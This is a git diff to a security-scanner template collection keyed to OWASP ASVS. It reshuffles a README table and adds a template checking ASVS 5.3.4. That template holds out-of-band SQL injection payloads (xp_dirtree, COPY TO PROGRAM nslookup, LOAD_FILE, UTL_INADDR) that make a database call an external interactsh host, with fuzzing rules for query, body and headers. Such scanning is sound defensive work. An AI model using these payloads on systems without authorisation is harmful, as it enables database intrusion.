diff --git a/README.md b/README.md
index d2a1b44..9384ee6 100644
--- a/README.md
+++ b/README.md
@@ -39,23 +39,24 @@ The project current core team are:
| Template Name | Vulnerable Page | Template Name | Vulnerable Page |
|---|
| 2.1.11 | ✔️ | 3.1.1 | ❌ |
| 3.4.1 | ❌ | 3.4.2 | ❌ |
-| 5.1.2 | ❌ | 5.1.5 | ✔️ |
+| 5.1.5 | ✔️ | 5.1.2 | ❌ |
| 5.1.1 | ❌ | 5.2.5.1 | ❌ |
| 5.2.1 | ❌ | 5.2.6 | ❌ |
-| 5.3.3.2 | ❌ | 5.3.9 | ✔️ |
-| 5.3.3.1 | ❌ | 5.5.2 | ❌ |
-| 8.2.1 | ❌ | 9.1.3 | ❌ |
-| 9.1.2 | ❌ | 12.1.1 | ✔️ |
-| 12.1.1.2 | ❌ | 12.3.3 | ✔️ |
-| 12.6.1 | ✔️ | 13.1.3 | ❌ |
-| 13.2.2 | ✔️ | 13.2.3 | ❌ |
-| 13.2.1 | ❌ | 13.3.1 | ✔️ |
-| 14.2.3 | ❌ | 14.3.2 | ❌ |
-| 14.4.3 | ❌ | 14.4.2 | ❌ |
-| 14.4.5 | ❌ | 14.4.6 | ❌ |
-| 14.4.4 | ❌ | 14.4.7 | ❌ |
-| 14.4.1 | ❌ | 14.5.3 | ✔️ |
-| 14.5.1 | ❌ | 14.5.2 | ✔️ |
+| 5.3.4 | ❌ | 5.3.3.2 | ❌ |
+| 5.3.9 | ✔️ | 5.3.3.1 | ❌ |
+| 5.5.2 | ❌ | 8.2.1 | ❌ |
+| 9.1.2 | ❌ | 9.1.3 | ❌ |
+| 12.1.1 | ✔️ | 12.1.1.2 | ❌ |
+| 12.3.3 | ✔️ | 12.6.1 | ✔️ |
+| 13.1.3 | ❌ | 13.2.2 | ✔️ |
+| 13.2.3 | ❌ | 13.2.1 | ❌ |
+| 13.3.1 | ✔️ | 14.2.3 | ❌ |
+| 14.3.2 | ❌ | 14.4.7 | ❌ |
+| 14.4.2 | ❌ | 14.4.5 | ❌ |
+| 14.4.1 | ❌ | 14.4.4 | ❌ |
+| 14.4.6 | ❌ | 14.4.3 | ❌ |
+| 14.5.2 | ✔️ | 14.5.3 | ✔️ |
+| 14.5.1 | ❌ |
diff --git a/templates/9.1.3.yaml b/templates/9.1.3.yaml
index 67aa151..045e9f8 100644
--- a/templates/9.1.3.yaml
+++ b/templates/9.1.3.yaml
@@ -45,4 +45,4 @@ ssl:
- type: json
json:
- " .tls_version"
-# digest: 4a0a00473045022100e9b21b02ae9125583f10e19a1e815d94d5cef592ec721113260e5cb97505b98d022027b64c7e5534e024598f75de201fe965b7c2c5b770d6f3f78ed783d52551a6ee:236a7c23afe836fbe231d6e037cff444
\ No newline at end of file
+# digest: 4b0a004830460221008abed7c5325a8518c05263575c8c5e574b1884952b2e75974d2be504961a7b9102210089b15b5102cc68184167d1a5270d4ff06a018de0eed03289ea71ba7fad0a50e8:236a7c23afe836fbe231d6e037cff444
\ No newline at end of file
diff --git a/templates/dast/5.3.4.yaml b/templates/dast/5.3.4.yaml
new file mode 100644
index 0000000..a7ee951
--- /dev/null
+++ b/templates/dast/5.3.4.yaml
@@ -0,0 +1,52 @@
+id: ASVS-4-0-3-V5-3-4
+
+info:
+ name: ASVS 5.3.4 Check
+ author: AmirHossein Raeisi,snoopy
+ severity: critical
+ classification:
+ cwe-id: CWE-918
+ reference:
+ - https://portswigger.net/web-security/sql-injection/cheat-sheet
+ tags: asvs,5.3.4
+ description: |
+ Verify that data selection or database queries (e.g. SQL, HQL, ORM, NoSQL) use parameterized queries, ORMs, entity frameworks, or are otherwise protected from database injection attacks.
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method != "OPTIONS"'
+
+ payloads:
+ sqli:
+ - "SELECT EXTRACTVALUE(xmltype(' %remote;]>'),'/l') FROM dual--"
+ - "SELECT UTL_INADDR.get_host_address('{{interactsh-url}}')--"
+ - "'; exec master..xp_dirtree '//{{interactsh-url}}/a'--"
+ - "copy (SELECT '') to program 'nslookup {{interactsh-url}}'--"
+ - "LOAD_FILE('\\\\{{interactsh-url}}\\a')-- -"
+ - "SELECT ... INTO OUTFILE '\\\\{{interactsh-url}}\a'-- -"
+
+ fuzzing:
+ - parts:
+ - query
+ - body
+ - header
+ type: postfix
+ mode: single
+ fuzz:
+ - "' UNION {{sqli}}"
+ - "\" UNION {{sqli}}"
+ - "' AND 1={{sqli}}"
+ - "\" AND 1={{sqli}}"
+ - " {{sqli}}"
+
+
+ stop-at-first-match: true
+ matchers:
+ - type: word
+ part: interactsh_protocol
+ words:
+ - "http"
+ - "dns"
+# digest: 4a0a004730450220632cd0002707fa5eeab5d7da85b3d6df805fb7bdd3a08ab2a39dafd607838f0502210095b1a397d2139214ae6eb25d742841f7656107457299fe89dde949eb0fb64bc2:236a7c23afe836fbe231d6e037cff444
\ No newline at end of file